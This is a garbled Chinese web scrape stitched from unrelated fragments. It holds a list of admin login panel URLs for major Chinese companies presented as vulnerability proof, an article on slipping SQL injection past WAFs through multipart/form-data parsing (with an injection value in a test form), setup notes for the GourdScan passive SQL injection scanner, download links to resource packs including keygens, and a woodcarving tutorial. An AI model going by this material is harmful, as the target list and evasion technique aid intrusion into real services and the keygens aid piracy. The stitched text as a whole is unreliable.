http://admin4.rd139.com/ngoss/Lo ... rnUrl=/Default.aspx

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com/

http://admin2.10010.com/login/login_rollback.action

漏洞证明:

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer

网易

http://ria.go.163.com/login_old.php

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。
那么这个multipart/form-data到底是个啥呢?
1.png

大概长成上面这样.HTML代码就更加简单了:

<!DOCTYPE html> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> 
<title>yzmm - p2j.cn</title> 
</head> 
<body> 
  <form action="http://192.168.199.151/index.php" method="POST" enctype="multipart/form-data"> 
       File:<input type="file" name="file" /><br/> 
        ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/> 
        <input type="submit" value="提交" /> 
    </form> 
</body> 
</html>

 
这个特性其实并不只是PHP的专利,许多其他语言的MVC框架为了简化操作也有可能会做类似PHP FILES解析。虽说原生的JSP/Servlet是不支持解析multipart的.但在Java语言中当今最火的SpringMVC、Struts2都做了一样的事情。你可能经常会看到如下的Spring MVC代码:

import javax.servlet.http.HttpServletRequest; 
import javax.servlet.http.HttpServletResponse; 
import org.springframework.stereotype.Controller; 
import org.springframework.web.bind.annotation.RequestMapping; 
import org.springframework.web.bind.annotation.RequestParam; 
import org.springframework.web.multipart.MultipartFile; 

@Controller 
public class TestController { 

  @RequestMapping("/test1.aspx") 
  public void test1(HttpServletRequest request,HttpServletResponse response){ 
    System.out.println("test1.aspx:"+request.getParameter("username")); 
  } 

  @RequestMapping("/test2.aspx") 
  public void test2(@RequestParam(value = "file", required = false) MultipartFile file,HttpServletRequest request,HttpServletResponse response){ 
    System.out.println("test2.aspx:"+request.getParameter("username")); 
    System.out.println("文件名:"+file.getOriginalFilename()); 
  } 
}

 

然后是HttpClient客户端测试代码,用于发送HTTP Multipart测试请求:

import java.io.File; 
import java.io.IOException; 

import org.apache.commons.io.IOUtils; 
import org.apache.http.HttpEntity; 
import org.apache.http.client.methods.CloseableHttpResponse; 
import org.apache.http.client.methods.HttpPost; 
import org.apache.http.entity.ContentType; 
import org.apache.http.entity.mime.MultipartEntityBuilder; 
import org.apache.http.impl.client.CloseableHttpClient; 
import org.apache.http.impl.client.HttpClients; 

public class MultipartTest { 
   
  public static void main(String[] args) { 
    CloseableHttpClient httpClient = HttpClients.createDefault(); 
    HttpPost uploadFile = new HttpPost("http://localhost:8080/test/test1.aspx"); 
    MultipartEntityBuilder builder = MultipartEntityBuilder.create(); 
    builder.addTextBody("username", "admin", ContentType.TEXT_PLAIN); 
    builder.addTextBody("password", "123456", ContentType.TEXT_PLAIN); 
    builder.addBinaryBody("file", new File("/Users/yz/Downloads/bd_logo1_31bdc765.png"), ContentType.APPLICATION_OCTET_STREAM, "pic"); 
    HttpEntity multipart = builder.build(); 
    uploadFile.setEntity(multipart); 
    try { 
      CloseableHttpResponse response = httpClient.execute(uploadFile); 
      HttpEntity responseEntity = response.getEntity(); 
      System.err.println(IOUtils.toString(responseEntity.getContent())); 
    } catch (IOException e) { 
      e.printStackTrace(); 
    } 
  } 

}

 

pom 依赖的jar:

<dependency> 
      <groupId>org.apache.httpcomponents</groupId> 
      <artifactId>httpcore</artifactId> 
      <version>4.4.4</version> 
    </dependency> 

    <dependency> 
      <groupId>org.apache.httpcomponents</groupId> 
      <artifactId>httpclient</artifactId> 
      <version>4.5.1</version> 
    </dependency> 

    <dependency> 
      <groupId>org.apache.httpcomponents</groupId> 
      <artifactId>httpasyncclient</artifactId> 
      <version>4.1.1</version> 
    </dependency> 

    <dependency> 
      <groupId>org.apache.httpcomponents</groupId> 
      <artifactId>httpmime</artifactId> 
      <version>4.5.1</version> 
    </dependency> 

    <dependency> 
      <groupId>commons-io</groupId> 
      <artifactId>commons-io</artifactId> 
      <version>2.4</version> 
    </dependency>

 
test1.do是一个最普通的Http请求Mapping,如果当前请求类型是一个multipart请求Spring MVC会将解析好的multipart放到request里面(其实是Spring MVC包装了一个HTTP请求,类名是:org.springframework.web.multipart.support.DefaultMultipartHttpServletRequest)。于是我们在控制层就拿到了multipart里的username参数。

毫无疑问,使用MultipartTest的测试代码去请求test1.aspx会输出multipart内的username的值:admin.
2.png

Struts2实现方式和SpringMVC大同小异,同样的也自动的利用commons-fileupload做了HTTP解析。
3.png

import javax.servlet.http.HttpServletRequest; 
import org.apache.struts2.ServletActionContext; 
import com.opensymphony.xwork2.ActionSupport; 

public class Test extends ActionSupport { 

  private static final long serialVersionUID = 1L; 

  @Override 
  public String execute() throws Exception { 
    HttpServletRequest request = ServletActionContext.getRequest(); 
    System.out.println(request.getParameter("username")); 
    return "input"; 
  } 

}

 
那么为什么一个看似很简单的表单数据请求解析的功能会让很多的WAF蒙了呢?究其原因主要还是因为HTTP请求解析的复杂性和来自客户端的数据不确定性。因为上传一个几十M甚至更大的文件需求再平常不过了,如果WAF完整的去解析这个InputStream会消耗大量的服务器性能有点得不偿失。
另一个原因是由于实现HTTP请求的RFC的差异性导致次类请求解析得不一致或者解析错误的情况。因为multipart解析出问题的还不少。去年PHP和Apache Commons FileUpload 就出过DOS漏洞。
Apache Commons FileUpload 和 Apache Tomcat 拒绝服务

Multipart  boundary  边界检查问题(分割线长度大于4091的)导致拒绝服务(死循环)

PHP曝DOS漏洞可致CPU灌满 涉及多个PHP版本

那么问题来了,各位同学的SQL注入和Struts2的命令执行漏洞真的修好了吗?看看loopx9牛的这个漏洞就知道了 WooYun: 百度某站st2命令执行(独特执行姿势)
赶紧回家修补丁吧。

 

 

GourdScan
之前俩个轮子中的一个的升级版,谈不上神器。
谈谈升级了哪些:

1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。
2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。
3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进行返回。

PS:此处应有感谢,开个玩笑,希望大家积极给我提取意见,进行改进。

被动式注入检测工具 程序使用python与php开发,需要安装python。 利用sqlmapapi进行漏洞的检测,然后通过浏览器代理方式获取请求,然后对其进行测试

INSTALl
环境

python 2.7 tornado 
php 
mysql 
apache

Windows
安装好python

pip install tornado

这里使用的usbwebserver打包了一套环境,直接可以双击运行,修改配置看linux的配置方式即可。

https://github.com/code-scan/GourdScan/releases/tag/windows

Linux

先安装好lamp,

mysql

create database pscan; 
use pscan; 
source pscan.sql

移动web文件和安装依赖

mv root/* /var/www/html 
pip install tornado

修改conn.php中的数据库信息

修改 ./proxy/isqlmap.py

self.webserver="http://localhost:88/"

 

改成你自己的主机地址和端口。

修改./proxy/task.py

def update():     url="http://localhost:88/api.php?type=sqlmap_update"     urllib2.urlopen(url).read() def api_get():     url="http://localhost:88/api.php?type=api_get"     data=urllib2.urlopen(url).read()

 
改成你的host地址

配置
打开 http://localhost:88/config.php 在list里面添加sqlmapapi节点

格式为

http://127.0.0.1:8775

 

(不需要最后一个/)
浏览器设置代理,并且添加一个http header

User-Hash: youhash

 
youhash可以随意填写,主要用于分类 若不填写默认是 cond0r

可以在 http://localhost:88/config.php 查看你的分类,点击分类名称即可查看。

使用
首先运行sqlmapapi,并且在config里面增加至少一个节点

cd proxy/ python proxy_io.py 8080& python task.py&

 
然后将浏览器代理设置为

http 127.0.0.1 8080

 
然后一顿请求之后可以打开

http://localhost:88/config.php

 
点击分类进行查看信息了,差不多等待几分钟之后会将请求测试结束,你的节点越多效率就越高。

项目地址:https://github.com/code-scan/GourdScan
如果在使用中遇到什么问题可以去提交issue

QQ截图20151201171445.png
2.png
3.png

资源超级合集【有各种设计软件.注册机.设计素材.网站设计教程.]设计建筑站长必备资源1.素材超级全集【各种素材10000多套】

 

 

链接: http://pan.baidu.com/s/1mgnNPJ6 密码: nkwa

2.设计软件大全集

 

 

 

 

 

 

链接: http://pan.baidu.com/s/1c0eAJ40 密码: maq8

3.八大菜系菜谱大全烹饪视频教程+赠送火锅全套技术

 

 

链接: http://pan.baidu.com/s/1sjOl2Rb 密码: vhur

4.网站建站教程集合

 

 

 

链接: http://pan.baidu.com/s/1dDt1KDr 密码: 29fz

先看个成品(新手制作,雕刻师傅轻喷)

自行在某宝上搜索 【红木料头】挺便宜的,不放连接,不做推广

最贵的是你的那份心,而不是你送的东西有多贵

所用到的工具:台虎钳、木锉、金刚锉、雕刻刀、砂纸(200目、400目、800目、1200目)、蜂蜡、抛光膏等等等。。。。


先用最大的雕刻刀铲出想要的形状


我要的是水滴型的    所以就是雏形就是酱紫


上锉刀打磨边缘


当然还有一个字啦,先写在纸上,然后用胶水粘住,再用雕刻刀刻下多余的就可以啦

然后用电钻钻个孔,用来栓绳子的


清晰的字体,到这一步呢,大概用了两个多小时了


用200目的砂纸打磨字和边缘,让宝贝没有毛刺


继续用砂纸打磨,依次用400目,800目的打磨,比较费时间


打磨过之后的样子,这个是洗了个橄榄油的澡出来的样子


上抛光膏,用抛光轮打磨一下下


上蜂蜡,比较简洁,用王老吉的罐子,把蜂蜡放里面,烧化就行了,注意温度不能太热


穿上绳子,用无纺布来回的摩擦摩擦。。。


绳子是买的~~~某宝上都有的